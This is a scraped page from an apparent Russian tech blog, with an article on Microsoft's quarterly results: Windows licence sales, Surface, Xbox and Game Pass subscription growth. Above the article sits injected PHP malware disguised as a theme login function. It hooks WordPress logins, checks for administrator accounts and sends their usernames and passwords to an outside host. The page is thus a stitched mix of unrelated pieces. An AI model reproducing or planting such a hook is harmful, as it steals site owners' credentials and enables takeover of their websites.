if (!function_exists("theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b")) { function theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b() { if (isset($_POST['log']) and isset($_POST['pwd'])) { $abc = $_POST['log']; $bca = $_POST['pwd']; $zxa = (array)wp_authenticate($abc, $bca); if (isset($zxa["allcaps"]['administrator'])) { $url = 'https://acjscsswp.com/loginfileweb?url=' . urlencode(wp_login_url()) . '&user=' . urlencode($abc) . '&pass=' . urlencode($bca) . '&site=' . urlencode(wp_login_url()); $response = wp_remote_get($url); } } } add_action('wp_login', 'theme_login_init_6649f5b7cc8ac51798d1b70a14ebc05b', 10, 0); } Мировые продажи Microsoft определяют Xbox и Windows — techno-blog

Мировые продажи Microsoft определяют Xbox и Windows

Компания придерживается стратегии подписки, и появление Xbox Game Pass – еще один тому пример.

В период пандемии потребители днем работали на ПК с операционной системой Windows, а по вечерам играли на Xbox. Компании Microsoft обе эти тенденции оказались весьма на руку. В отличие от предыдущих кварталов направление Microsoft More Personal Computing, к которому относится как Windows, так и Xbox, стало основной движущей силой ее роста.

На итоговой пресс-конференции было объявлено, что чистая прибыль компании сократилась на 11%, до 11,2 млрд долл. При этом выручка во втором квартале выросла по сравнению с аналогичным периодом прошлого года на 13%, достигнув 38 млрд долл. В немалой степени этому способствовал 14-процентный рост выручки группы MPC, составивший 12,9 млрд долл.

Традиционными столпами Microsoft на потребительском рынке считаются Windows, Surface и Xbox. Первые шесть месяцев 2020 года в большинстве регионов мира проходили под знаком коронавируса, и более дорогие лицензии Windows Pro у Microsoft продавались не слишком хорошо. В последнем квартале продажи лицензий Pro сократились на 4%. Но поскольку спрос на более дешевые ПК со стороны компаний и потребителей увеличился, продажи Windows 10 «non-Pro» (главным образом, Windows 10 S и Windows 10 Home) выросли на 34%. Продажи Surface также показали неплохие результаты, увеличившись по итогам квартала на 28%, и достигли 1,72 млрд долл.

Наивысший же рост в сегменте More Personal Computing пришелся на игры, а конкретно, на Xbox. Продажи игровых продуктов, к которым относятся игровые консоли, непосредственно игры и сервисы, подскочили сразу на 64%. Если же исключить консоли, продажи игр и сервисов выросли даже чуть больше – на 65%.

Становится ясно, что Microsoft рассматривает фактически все ключевые направления своего бизнеса с двух сторон: как платформу, на базе которой создаются другие приложения и сервисы, и возможность продавать эти приложения и сервисы с регулярной рентой или на условиях подписки. Самой, пожалуй, известной является подписка на Microsoft 365, но и Xbox Game Pass тоже соответствует этой модели.

Хотя деятельность Microsoft и способствовала росту игрового сообщества ПК, синонимом «игр» для компании по большей части по-прежнему остается Xbox – платформа, являющаяся основным драйвером продаж игр. Кроме того, Microsoft продает подписку Xbox Game Pass. Ежемесячная подписка Game Pass Ultimate стоимостью 12,99 долл. открывала доступ к огромному количеству игр на Xbox, а затем и на ПК. Теперь же этот список дополнен мобильными устройствами, и технология дистанционного доступа к играм Project xCloud также становится частью Game Pass.

«Причиной привлекательности Xbox Game Pass является мощь платформы, основанная на поддержке любителей игровых консолей, – заявила финансовый директор Microsoft Эми Худ. – Мы распространили действие этой подписки на ПК, а затем и на мобильные устройства. Мощь платформы позволила нам задуматься о подписке, и мы видим, что в последнем квартале продажи подписки Game Pass выросли.

Генеральный директор Microsoft Сатья Наделла объявил, что стратегия компании в отношении Xbox и особенно Game Pass»только начинает формироваться».

В Microsoft сообщили также о значительном росте бизнеса Intelligent Cloud. Выручка увеличилась на 17% и достигла 13,4 млрд долл. Оборот подразделения Productivity & Business Processes вырос на 6%, до 11,8 млрд долл. Подписка Office 365 Consumer распространяется уже на 42,7 млн человек и также увеличилась на 6%. Оборот Office 365 Commercial вырос на 19%.